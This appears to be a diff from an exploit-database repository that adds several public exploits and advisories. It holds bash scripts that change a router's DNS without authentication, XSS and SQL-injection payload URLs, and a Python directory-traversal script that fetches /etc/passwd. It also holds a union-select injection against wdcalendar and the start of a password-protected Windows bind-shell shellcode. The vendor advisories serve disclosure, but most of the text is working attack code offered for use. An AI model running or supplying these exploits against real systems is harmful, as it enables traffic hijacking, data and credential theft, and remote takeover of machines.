echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

82
platforms/cgi/webapps/40372.sh Executable file
View file

@ -0,0 +1,82 @@
#!/bin/bash
#
# COMTREND ADSL Router CT-5367 C01_R12, CT-5624 C01_R03
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " COMTREND ADSL Router CT-5367 C01_R12, CT-5624 C01_R03"
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

81
platforms/cgi/webapps/40373.sh Executable file
View file

@ -0,0 +1,81 @@
#!/bin/bash
#
# ASUS DSL-X11 ADSL Router Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " ASUS DSL-X11 ADSL Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

View file

@ -0,0 +1,89 @@
Product: OX Guard
Vendor: OX Software GmbH
Internal reference: 47878 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
Vendor notification: 2016-08-03
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6854
CVSS: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code which got injected to a mail with inline PGP signature gets executed when verifying the signature.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Add JS code to a mail body
2. Use PGP inline signatures
3. Open the mail in OX App Suite
Solution:
Users should not open mail from untrusted sources. We made sure that the verified content does not get handled in a way that code can get executed. Operators should update to the latest Patch Release.
Internal reference: 47914 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: secator
Vendor notification: 2016-08-05
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6853
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code and references to external websites can be injected to the names of PGP public keys. When requesting that key later on using a specific URL, such script code might get executed. In case of injecting external websites, users might get lured into a phishing scheme.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. As attacker, create a PGP key with malicious name
2. Get the key ID and create a link which will fetch that key
3. Make the victim call that link
Solution:
Users should not click links from untrusted sources. We now sanitize the returned key and make sure HTML content does not get interpreted by the browser. Operators should update to the latest Patch Release.
Internal reference: 48080 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
Vendor notification: 2016-08-15
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6851
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be provided as parameter to the OX Guard guest reader web application. This allows cross-site scripting attacks against arbitrary users since no prior authentication is needed.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.) in case the user has a active session on the same domain already.
Steps to reproduce:
1. As attacker, create a hyperlink with script code included at the "templid" parameter
2. Make the victim open that link
Solution:
Users should not click links from untrusted sources. We now sanitize the returned content for this parameter. Operators should update to the latest Patch Release.

View file

@ -0,0 +1,91 @@
Product: OX App Suite
Vendor: OX Software GmbH
Internal reference: 46484 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev46, 7.6.3-rev14, 7.8.0-rev29, 7.8.1-rev16, 7.8.2-rev5
Vendor notification: 2016-06-09
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Description fields of ressources could be used to inject malicious HTML/JS code. When scheduling group appointments and adding such a ressource, the injected code gets executed in the context of a user when viewing appointment details.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Note however that explicit permissions are required to create or modify resources in a way that they could contain script code.
Steps to reproduce:
1. Provide HTML including script code as resource description
2. Add this resource to a group appointment
3. As group members, examine the appointment details.
Solution:
Permission settings can be temporarily tightened to reject resource modifications by users. Such descriptions are now handled as plain-text to avoid any kind of script execution. Operators should update to the latest Patch Release.
Internal reference: 46894 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: backend
Researcher credits: Jakub A>>oczek
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
Vendor notification: 2016-06-27
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be injected to HTML E-Mail hyperlinks by using the "data" schema. This method bypasses existing sanitization methods. As a result the script code got injected to hyperlinks displayed at OX App Suite UI.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Compose malicious mail with a link containing a "data" schema with JS code included
2. Make a user click the link
Proof of concept:
<a href="data:text/html,<script>alert(document.cookie);</script>">click me</a>
Solution:
Users should not or interact with mails from untrusted external sources. Targets of hyperlinks shall be examined before clicking the respective link. Operators should update to the latest Patch Release.
Internal reference: 47062 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
Vendor notification: 2016-06-27
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be stored to the temporary storage for inline-images in HTML E-Mails. Content is available to the user who stored it but also to other (external) users if the unique random ID is known. Note that this storage is volatile and expires if not regulary refreshed. A attacker could however re-upload and refresh the file once uploaded.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create a file with script code that gets rendered within the browser, e.g. a SVG image with XSL headers
2. Alter the upload request for file?action=new from "image" to "file" to circumvent image related checks
3. Set a MIME-type that makes the browser render the file content inline instead of downloading
4. Fetch the returned UUID
5. Create a link which includes the storage location for the specific item
6. Make a user click that link
Solution:
Users should not open hyperlinks from untrusted sources. Operators should update to the latest Patch Release.

View file

@ -1,9 +1,71 @@
source: http://www.securityfocus.com/bid/20931/info
All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, access or modify sensitive data, execute arbitrary script code in the context of the application, compromise the application and possibly exploit latent vulnerabilities in the underlying system; other attacks are also possible.
AIOCP 1.3.007 and prior versions are vulnerable.
http://www.example.com/public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main
Cross-site scripting =
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&amp;topid=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&amp;topid=53&amp;forid=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&amp;topid=53&amp;forid=23&amp;catid=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_dpage.php?choosed_language=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&amp;topid=53&amp;forid=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&amp;topid=53&amp;forid=3&amp;catid=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_show_ec_products.php?order_field=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_users_online.php?order_field=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_links_search.php?orderdir=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
Remote File-Include =
/admin/code/index.php?load_page=http%3A//google.com
( no login needed for the remote file include )
SQL-Injection =
- http://www.example.com/public/code/cp_dpage.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_news.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_news.php?news_category=[sql]
-
http://www.example.com/public/code/cp_forum_view.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_edit_user.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_newsletter.php?nlmsg_nlcatid=[sql]
-
http://www.example.com/public/code/cp_newsletter.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_links.php?links_category=[sql]
- http://www.example.com/public/code/cp_links.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_contact_us.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_show_ec_products.php?product_category_id=[sql]
-
http://www.example.com/public/code/cp_show_ec_products.php?product_category_id=[sql]
-
http://www.example.com/public/code/cp_show_ec_products.php?order_field=[sql]
- http://www.example.com/public/code/cp_login.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_users_online.php?order_field=cpsession_expiry&amp;submitted=1&amp;firstrow=[sql]
-
http://www.example.com/public/code/cp_codice_fiscale.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_links_search.php?orderdir=[sql]
Full Path Disclosure =
-
http://www.example.com/public/code/cp_dpage.php?choosed_language=eng&amp;aiocp_dp[]=_main
-
http://www.example.com/public/code/cp_show_ec_products.php?order_field[]=
- http://www.example.com/public/code/cp_show_page_help.php?hp[]=

36
platforms/php/webapps/40361.py Executable file
View file

@ -0,0 +1,36 @@
# Exploit Title: Cherry Music v0.35.1 directory traversal vulnerability allows authenticated users to download arbitrary files
# Date: 11-09-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: http://www.fomori.org/cherrymusic/index.html
# Software Link: http://www.fomori.org/cherrymusic/versions/cherrymusic-0.35.1.tar.gz
# Version: 0.35.1
# Tested on: ubuntu 14.04 LTS
# CVE : CVE-2015-8309
import urllib2, cookielib, urllib
#set parameters here
username = 'admin'
password = 'Password01'
baseUrl = 'http://localhost:8080/'
targetFile = '/etc/passwd'
downloadFileName = 'result.zip'
####
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
params = urllib.urlencode({'username': username, 'password': password, 'login': 'login'})
req = urllib2.Request(baseUrl, params)
response = opener.open(req)
for c in cj:
if c.name == "session_id":
session_id = c.value
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders.append(('Cookie', 'session_id=' + session_id))
params = urllib.urlencode({'value': '["' + targetFile + '"]'})
request = urllib2.Request(baseUrl + "download", params)
response = opener.open(request).read()
with open(downloadFileName, 'wb') as zipFile:
zipFile.write(response)

32
platforms/php/webapps/40364.txt Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: wdcalendar version 2 sql injection vulnerability
# Google Dork: allinurl:"wdcalendar/edit.php"
# Date: 12/09/2016
# Exploit Author: Alfonso Castillo Angel
# Software Link: https://github.com/ronisaha/wdCalendar
# Version: Version 2
# Tested on: Windows 7 ultimate
# Category: webapps
* Affected file -> edit.php and edit.db.php
* Exploit ->
http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9--
* Vulnerable code:
function getCalendarByRange($id){
try{
$db = new DBConnection();
$db->getConnection();
$sql = "select * from `jqcalendar` where `id` = " . $id; //the
variable is not filtered properly
$handle = mysql_query($sql);
//echo $sql;
$row = mysql_fetch_object($handle);
}catch(Exception $e){
}
return $row;
}
if($_GET["id"]){
$event = getCalendarByRange($_GET["id"]); //the variable is not filtered
properly

View file

@ -0,0 +1,736 @@
/*
# Title : Windows x86 password protected bind shell tcp shellcode
# Date : 12-09-2016
# Author : Roziul Hasan Khan Shifat
# size : 637 bytes
# Tested On : Windows 7 ultimate x86 x64
# Email : shifath12@gmail.com
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 99 cltd
1: 64 8b 42 30 mov %fs:0x30(%edx),%eax
5: 8b 40 0c mov 0xc(%eax),%eax
8: 8b 70 14 mov 0x14(%eax),%esi
b: ad lods %ds:(%esi),%eax
c: 96 xchg %eax,%esi
d: ad lods %ds:(%esi),%eax
e: 8b 78 10 mov 0x10(%eax),%edi
11: 8b 5f 3c mov 0x3c(%edi),%ebx
14: 01 fb add %edi,%ebx
16: 8b 5b 78 mov 0x78(%ebx),%ebx
19: 01 fb add %edi,%ebx
1b: 8b 73 20 mov 0x20(%ebx),%esi
1e: 01 fe add %edi,%esi
00000020 <g>:
20: 42 inc %edx
21: ad lods %ds:(%esi),%eax
22: 01 f8 add %edi,%eax
24: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2a: 75 f4 jne 20 <g>
2c: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
33: 75 eb jne 20 <g>
35: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
3c: 75 e2 jne 20 <g>
3e: 8b 73 1c mov 0x1c(%ebx),%esi
41: 01 fe add %edi,%esi
43: 8b 0c 96 mov (%esi,%edx,4),%ecx
46: 01 f9 add %edi,%ecx
48: 83 ec 50 sub $0x50,%esp
4b: 8d 34 24 lea (%esp),%esi
4e: 89 0e mov %ecx,(%esi)
50: 99 cltd
51: 68 73 41 41 41 push $0x41414173
56: 88 54 24 02 mov %dl,0x2(%esp)
5a: 68 6f 63 65 73 push $0x7365636f
5f: 68 74 65 50 72 push $0x72506574
64: 68 43 72 65 61 push $0x61657243
69: 8d 14 24 lea (%esp),%edx
6c: 52 push %edx
6d: 57 push %edi
6e: ff d1 call *%ecx
70: 83 c4 10 add $0x10,%esp
73: 89 46 04 mov %eax,0x4(%esi)
76: 99 cltd
77: 68 65 73 73 41 push $0x41737365
7c: 88 54 24 03 mov %dl,0x3(%esp)
80: 68 50 72 6f 63 push $0x636f7250
85: 68 45 78 69 74 push $0x74697845
8a: 8d 14 24 lea (%esp),%edx
8d: 52 push %edx
8e: 57 push %edi
8f: ff 16 call *(%esi)
91: 83 c4 0c add $0xc,%esp
94: 89 46 08 mov %eax,0x8(%esi)
97: 99 cltd
98: 52 push %edx
99: 68 61 72 79 41 push $0x41797261
9e: 68 4c 69 62 72 push $0x7262694c
a3: 68 4c 6f 61 64 push $0x64616f4c
a8: 8d 14 24 lea (%esp),%edx
ab: 52 push %edx
ac: 57 push %edi
ad: ff 16 call *(%esi)
af: 83 c4 0c add $0xc,%esp
b2: 99 cltd
b3: 68 6c 6c 6c 6c push $0x6c6c6c6c
b8: 88 54 24 02 mov %dl,0x2(%esp)
bc: 68 33 32 2e 64 push $0x642e3233
c1: 68 77 73 32 5f push $0x5f327377
c6: 8d 14 24 lea (%esp),%edx
c9: 52 push %edx
ca: ff d0 call *%eax
cc: 83 c4 0c add $0xc,%esp
cf: 97 xchg %eax,%edi
d0: 8b 5f 3c mov 0x3c(%edi),%ebx
d3: 01 fb add %edi,%ebx
d5: 8b 5b 78 mov 0x78(%ebx),%ebx
d8: 01 fb add %edi,%ebx
da: 8b 5b 1c mov 0x1c(%ebx),%ebx
dd: 01 fb add %edi,%ebx
df: 99 cltd
e0: 66 ba c8 01 mov $0x1c8,%dx
e4: 8b 04 13 mov (%ebx,%edx,1),%eax
e7: 01 f8 add %edi,%eax
e9: 89 46 0c mov %eax,0xc(%esi)
ec: 8b 43 50 mov 0x50(%ebx),%eax
ef: 01 f8 add %edi,%eax
f1: 89 46 10 mov %eax,0x10(%esi)
f4: 8b 43 04 mov 0x4(%ebx),%eax
f7: 01 f8 add %edi,%eax
f9: 89 46 14 mov %eax,0x14(%esi)
fc: 8b 03 mov (%ebx),%eax
fe: 01 f8 add %edi,%eax
100: 89 46 18 mov %eax,0x18(%esi)
103: 8b 43 30 mov 0x30(%ebx),%eax
106: 01 f8 add %edi,%eax
108: 89 46 1c mov %eax,0x1c(%esi)
10b: 8b 43 08 mov 0x8(%ebx),%eax
10e: 01 f8 add %edi,%eax
110: 89 46 20 mov %eax,0x20(%esi)
113: 8b 43 3c mov 0x3c(%ebx),%eax
116: 01 f8 add %edi,%eax
118: 89 46 24 mov %eax,0x24(%esi)
11b: 66 ba 88 01 mov $0x188,%dx
11f: 8b 04 13 mov (%ebx,%edx,1),%eax
122: 01 f8 add %edi,%eax
124: 89 46 28 mov %eax,0x28(%esi)
127: 8b 43 48 mov 0x48(%ebx),%eax
12a: 01 f8 add %edi,%eax
12c: 89 46 2c mov %eax,0x2c(%esi)
12f: 99 cltd
130: 8d 4e 30 lea 0x30(%esi),%ecx
133: c6 01 02 movb $0x2,(%ecx)
136: 66 c7 41 02 11 5c movw $0x5c11,0x2(%ecx)
13c: 89 51 04 mov %edx,0x4(%ecx)
13f: 89 51 08 mov %edx,0x8(%ecx)
142: 89 51 0c mov %edx,0xc(%ecx)
145: 8d 4e 40 lea 0x40(%esi),%ecx
148: c7 01 45 6e 74 65 movl $0x65746e45,(%ecx)
14e: c7 41 04 72 20 70 61 movl $0x61702072,0x4(%ecx)
155: c7 41 08 73 73 20 63 movl $0x63207373,0x8(%ecx)
15c: c7 41 0c 6f 64 65 3a movl $0x3a65646f,0xc(%ecx)
163: 99 cltd
164: 66 ba 90 01 mov $0x190,%dx
168: 29 d4 sub %edx,%esp
16a: 8d 0c 24 lea (%esp),%ecx
16d: 83 c2 72 add $0x72,%edx
170: 51 push %ecx
171: 52 push %edx
172: ff 56 0c call *0xc(%esi)
175: 99 cltd
176: 52 push %edx
177: 52 push %edx
178: 52 push %edx
179: b2 06 mov $0x6,%dl
17b: 52 push %edx
17c: 99 cltd
17d: 42 inc %edx
17e: 52 push %edx
17f: 42 inc %edx
180: 52 push %edx
181: ff 56 28 call *0x28(%esi)
184: 97 xchg %eax,%edi
185: 99 cltd
186: 42 inc %edx
187: 52 push %edx
188: 8d 0c 24 lea (%esp),%ecx
18b: 42 inc %edx
18c: 52 push %edx
18d: 51 push %ecx
18e: 83 c2 02 add $0x2,%edx
191: 52 push %edx
192: 99 cltd
193: 66 ba ff ff mov $0xffff,%dx
197: 52 push %edx
198: 57 push %edi
199: ff 56 10 call *0x10(%esi)
19c: 99 cltd
19d: b2 10 mov $0x10,%dl
19f: 52 push %edx
1a0: 8d 4e 30 lea 0x30(%esi),%ecx
1a3: 52 push %edx
1a4: 51 push %ecx
1a5: 57 push %edi
1a6: ff 56 14 call *0x14(%esi)
1a9: 99 cltd
1aa: 42 inc %edx
1ab: 52 push %edx
1ac: 57 push %edi
1ad: ff 56 1c call *0x1c(%esi)
1b0: 99 cltd
1b1: 8d 5e 30 lea 0x30(%esi),%ebx
1b4: 89 13 mov %edx,(%ebx)
1b6: 89 53 04 mov %edx,0x4(%ebx)
1b9: 89 53 08 mov %edx,0x8(%ebx)
1bc: 89 53 0c mov %edx,0xc(%ebx)
000001bf <a>:
1bf: 99 cltd
1c0: b2 10 mov $0x10,%dl
1c2: 52 push %edx
1c3: 8d 0c 24 lea (%esp),%ecx
1c6: 8d 5e 30 lea 0x30(%esi),%ebx
1c9: 51 push %ecx
1ca: 53 push %ebx
1cb: 57 push %edi
1cc: ff 56 18 call *0x18(%esi)
1cf: 99 cltd
1d0: 50 push %eax
1d1: 52 push %edx
1d2: b2 10 mov $0x10,%dl
1d4: 52 push %edx
1d5: 8d 4e 40 lea 0x40(%esi),%ecx
1d8: 51 push %ecx
1d9: 50 push %eax
1da: ff 56 2c call *0x2c(%esi)
1dd: 58 pop %eax
1de: 89 c3 mov %eax,%ebx
1e0: 99 cltd
1e1: 52 push %edx
1e2: b2 10 mov $0x10,%dl
1e4: 52 push %edx
1e5: 8d 4e 40 lea 0x40(%esi),%ecx
1e8: 51 push %ecx
1e9: 50 push %eax
1ea: ff 56 24 call *0x24(%esi)
1ed: 8d 4e 40 lea 0x40(%esi),%ecx
1f0: 81 39 64 61 6d 6e cmpl $0x6e6d6164,(%ecx)
1f6: 75 5e jne 256 <kick_out>
1f8: 81 79 04 5f 69 74 21 cmpl $0x2174695f,0x4(%ecx)
1ff: 75 55 jne 256 <kick_out>
201: 81 79 08 24 24 23 23 cmpl $0x23232424,0x8(%ecx)
208: 75 4c jne 256 <kick_out>
20a: 81 79 0c 40 3b 2a 23 cmpl $0x232a3b40,0xc(%ecx)
211: 75 43 jne 256 <kick_out>
213: 89 df mov %ebx,%edi
215: 83 ec 10 sub $0x10,%esp
218: 8d 1c 24 lea (%esp),%ebx
21b: 99 cltd
21c: 57 push %edi
21d: 57 push %edi
21e: 57 push %edi
21f: 52 push %edx
220: 52 push %edx
221: b2 ff mov $0xff,%dl
223: 42 inc %edx
224: 52 push %edx
225: 99 cltd
226: 52 push %edx
227: 52 push %edx
228: 52 push %edx
229: 52 push %edx
22a: 52 push %edx
22b: 52 push %edx
22c: 52 push %edx
22d: 52 push %edx
22e: 52 push %edx
22f: 52 push %edx
230: b2 44 mov $0x44,%dl
232: 52 push %edx
233: 8d 0c 24 lea (%esp),%ecx
236: 99 cltd
237: 68 63 6d 64 41 push $0x41646d63
23c: 88 54 24 03 mov %dl,0x3(%esp)
240: 8d 04 24 lea (%esp),%eax
243: 53 push %ebx
244: 51 push %ecx
245: 52 push %edx
246: 52 push %edx
247: 52 push %edx
248: 42 inc %edx
249: 52 push %edx
24a: 99 cltd
24b: 52 push %edx
24c: 52 push %edx
24d: 50 push %eax
24e: 52 push %edx
24f: ff 56 04 call *0x4(%esi)
252: 50 push %eax
253: ff 56 08 call *0x8(%esi)
00000256 <kick_out>:
256: 53 push %ebx
257: ff 56 20 call *0x20(%esi)
25a: 8d 4e 40 lea 0x40(%esi),%ecx
25d: c7 01 45 6e 74 65 movl $0x65746e45,(%ecx)
263: c7 41 04 72 20 70 61 movl $0x61702072,0x4(%ecx)
26a: c7 41 08 73 73 20 63 movl $0x63207373,0x8(%ecx)
271: c7 41 0c 6f 64 65 3a movl $0x3a65646f,0xc(%ecx)
278: e9 42 ff ff ff jmp 1bf <a>
*/
/*
section .text
global _start
_start:
cdq
mov eax,[fs:edx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB.Ldr
mov esi,[eax+0x14] ;PEB.Ldr->InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov edi,[eax+0x10] ;kernel32.dll base address
mov ebx,[edi+0x3c]
add ebx,edi
mov ebx,[ebx+0x78]
add ebx,edi
mov esi,[ebx+0x20]
add esi,edi
g:
inc edx
lodsd
add eax,edi
cmp dword [eax],'GetP'
jne g
cmp dword [eax+4],'rocA'
jne g
cmp dword [eax+8],'ddre'
jne g
mov esi,[ebx+0x1c]
add esi,edi
mov ecx,[esi+edx*4]
add ecx,edi
sub esp,80
lea esi,[esp]
mov [esi],dword ecx ;GetProcAddress() 0
;-----------------------
;address CreateProcessA()
cdq
push 0x41414173
mov [esp+2],byte dl
push 0x7365636f
push 0x72506574
push 0x61657243
lea edx,[esp]
push edx
push edi
call ecx
;----------------------
add esp,16
mov [esi+4],dword eax ;CreateProcessA() 4
;-------------------------------
;address ExitProcess()
cdq
push 0x41737365
mov [esp+3],byte dl
push 0x636f7250
push 0x74697845
lea edx,[esp]
push edx
push edi
call [esi]
;-------------------------------
add esp,12
mov [esi+8],dword eax ;ExitProcess() 8
;----------------------------------
cdq
push edx
push 0x41797261
push 0x7262694c
push 0x64616f4c
lea edx,[esp]
push edx
push edi
call [esi]
